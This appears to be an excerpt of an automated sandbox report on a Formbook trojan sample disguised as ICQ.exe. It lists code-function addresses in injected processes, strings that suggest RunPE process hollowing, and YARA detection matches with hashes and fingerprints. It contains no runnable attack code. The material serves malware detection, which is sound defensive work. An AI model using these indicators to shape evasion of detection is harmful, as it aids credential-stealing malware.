          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188AB403_2_0188AB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA803_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DAD003_2_017DAD00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186CD1F3_2_0186CD1F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CADE03_2_017CADE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E8DBF3_2_017E8DBF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870CB53_2_01870CB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0C003_2_017D0C00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0CF23_2_017C0CF2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184EFA03_2_0184EFA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F0F303_2_017F0F30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DCFE03_2_017DCFE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01812F283_2_01812F28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C2FC83_2_017C2FC8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01872F303_2_01872F30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01844F403_2_01844F40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188CE933_2_0188CE93
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0E593_2_017D0E59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188EEDB3_2_0188EEDB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188EE263_2_0188EE26
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2E903_2_017E2E90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BF1723_2_017BF172
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DB1B03_2_017DB1B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0189B16B3_2_0189B16B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0180516C3_2_0180516C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187F0CC3_2_0187F0CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018870E93_2_018870E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188F0E03_2_0188F0E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D70C03_2_017D70C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0181739A3_2_0181739A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BD34C3_2_017BD34C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188132D3_2_0188132D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018712ED3_2_018712ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EB2C03_2_017EB2C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D52A03_2_017D52A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186D5B03_2_0186D5B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018875713_2_01887571
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C14603_2_017C1460
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188F43F3_2_0188F43F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188F7B03_2_0188F7B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018816CC3_2_018816CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D99503_2_017D9950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EB9503_2_017EB950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018659103_2_01865910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183D8003_2_0183D800
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D38E03_2_017D38E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01845BF03_2_01845BF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0180DBF93_2_0180DBF9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188FB763_2_0188FB76
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EFB803_2_017EFB80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01815AA03_2_01815AA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01871AA33_2_01871AA3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186DAAC3_2_0186DAAC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187DAC63_2_0187DAC6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188FA493_2_0188FA49
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01887A463_2_01887A46
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01843A6C3_2_01843A6C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D3D403_2_017D3D40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EFDC03_2_017EFDC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01881D5A3_2_01881D5A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01887D733_2_01887D73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188FCF23_2_0188FCF2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01849C323_2_01849C32
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188FFB13_2_0188FFB1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188FF093_2_0188FF09
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01793FD23_2_01793FD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01793FD53_2_01793FD5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D1F923_2_017D1F92
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D9EB03_2_017D9EB0
          Source: C:\Windows\explorer.exeCode function: 4_2_104220364_2_10422036
          Source: C:\Windows\explorer.exeCode function: 4_2_104190824_2_10419082
          Source: C:\Windows\explorer.exeCode function: 4_2_1041AD024_2_1041AD02
          Source: C:\Windows\explorer.exeCode function: 4_2_104209124_2_10420912
          Source: C:\Windows\explorer.exeCode function: 4_2_104265CD4_2_104265CD
          Source: C:\Windows\explorer.exeCode function: 4_2_104232324_2_10423232
          Source: C:\Windows\explorer.exeCode function: 4_2_1041DB304_2_1041DB30
          Source: C:\Windows\explorer.exeCode function: 4_2_1041DB324_2_1041DB32
          Source: C:\Windows\explorer.exeCode function: 4_2_10F752324_2_10F75232
          Source: C:\Windows\explorer.exeCode function: 4_2_10F6B0824_2_10F6B082
          Source: C:\Windows\explorer.exeCode function: 4_2_10F740364_2_10F74036
          Source: C:\Windows\explorer.exeCode function: 4_2_10F785CD4_2_10F785CD
          Source: C:\Windows\explorer.exeCode function: 4_2_10F6FB324_2_10F6FB32
          Source: C:\Windows\explorer.exeCode function: 4_2_10F6FB304_2_10F6FB30
          Source: C:\Windows\explorer.exeCode function: 4_2_10F729124_2_10F72912
          Source: C:\Windows\explorer.exeCode function: 4_2_10F6CD024_2_10F6CD02
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044424465_2_04442446
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044344205_2_04434420
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0443E4F65_2_0443E4F6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043905355_2_04390535
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044505915_2_04450591
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043AC6E05_2_043AC6E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043907705_2_04390770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043B47505_2_043B4750
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0438C7C05_2_0438C7C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044220005_2_04422000
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044181585_2_04418158
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043801005_2_04380100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0442A1185_2_0442A118
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044481CC5_2_044481CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044441A25_2_044441A2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044501AA5_2_044501AA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044302745_2_04430274
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044102C05_2_044102C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444A3525_2_0444A352
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044503E65_2_044503E6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0439E3F05_2_0439E3F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04390C005_2_04390C00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04380CF25_2_04380CF2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04430CB55_2_04430CB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0439AD005_2_0439AD00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0442CD1F5_2_0442CD1F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043A8DBF5_2_043A8DBF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0438ADE05_2_0438ADE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04390E595_2_04390E59
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444EE265_2_0444EE26
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444EEDB5_2_0444EEDB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043A2E905_2_043A2E90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444CE935_2_0444CE93
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04404F405_2_04404F40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043B0F305_2_043B0F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043D2F285_2_043D2F28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04432F305_2_04432F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0439CFE05_2_0439CFE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0440EFA05_2_0440EFA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04382FC85_2_04382FC8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043928405_2_04392840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0439A8405_2_0439A840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043768B85_2_043768B8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043BE8F05_2_043BE8F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043A69625_2_043A6962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043929A05_2_043929A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0445A9A65_2_0445A9A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0438EA805_2_0438EA80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444AB405_2_0444AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04446BD75_2_04446BD7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043814605_2_04381460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444F43F5_2_0444F43F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044475715_2_04447571
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044595C35_2_044595C3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0442D5B05_2_0442D5B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043D56305_2_043D5630
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044416CC5_2_044416CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444F7B05_2_0444F7B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0443F0CC5_2_0443F0CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444F0E05_2_0444F0E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044470E95_2_044470E9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043970C05_2_043970C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0445B16B5_2_0445B16B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0437F1725_2_0437F172
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C516C5_2_043C516C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0439B1B05_2_0439B1B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043952A05_2_043952A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044312ED5_2_044312ED
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043AB2C05_2_043AB2C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444132D5_2_0444132D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0437D34C5_2_0437D34C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043D739A5_2_043D739A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04409C325_2_04409C32
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444FCF25_2_0444FCF2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04441D5A5_2_04441D5A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04447D735_2_04447D73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04393D405_2_04393D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043AFDC05_2_043AFDC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04399EB05_2_04399EB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444FF095_2_0444FF09
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04391F925_2_04391F92
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04353FD55_2_04353FD5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04353FD25_2_04353FD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444FFB15_2_0444FFB1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043FD8005_2_043FD800
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043938E05_2_043938E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044259105_2_04425910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043999505_2_04399950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043AB9505_2_043AB950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04447A465_2_04447A46
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444FA495_2_0444FA49
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04403A6C5_2_04403A6C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0443DAC65_2_0443DAC6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043D5AA05_2_043D5AA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04431AA35_2_04431AA3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0442DAAC5_2_0442DAAC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0444FB765_2_0444FB76
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04405BF05_2_04405BF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043AFB805_2_043AFB80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043CDBF95_2_043CDBF9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AE5CB5_2_024AE5CB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AD8565_2_024AD856
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AE8F75_2_024AE8F7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_02499E605_2_02499E60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_02499E1A5_2_02499E1A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024ADF945_2_024ADF94
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_02492FB05_2_02492FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AEC185_2_024AEC18
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024ADD445_2_024ADD44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_02492D8A5_2_02492D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_02492D905_2_02492D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FA0365_2_041FA036
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F2D025_2_041F2D02
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FE5CD5_2_041FE5CD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F10825_2_041F1082
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F89125_2_041F8912
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FB2325_2_041FB232
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F5B325_2_041F5B32
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F5B305_2_041F5B30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 001F554A appears 43 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0440F290 appears 105 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043FEA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0437B970 appears 280 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043C5130 appears 58 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 001F65D7 appears 33 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043D7E54 appears 111 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 017BB970 appears 280 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 01817E54 appears 102 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 01805130 appears 58 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0183EA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0184F290 appears 105 times
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228
          Source: VFylJFPzqX.exe, 00000000.00000000.1405625354.0000000000198000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameICQ.exe0 vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1487301628.0000000005801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSbKopBnfhlkIJ.dll< vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSbKopBnfhlkIJ.dll< vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1468193156.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1489902249.0000000007520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRunPe2-(dll).dll: vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exeBinary or memory string: OriginalFilenameICQ.exe0 vs VFylJFPzqX.exe
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
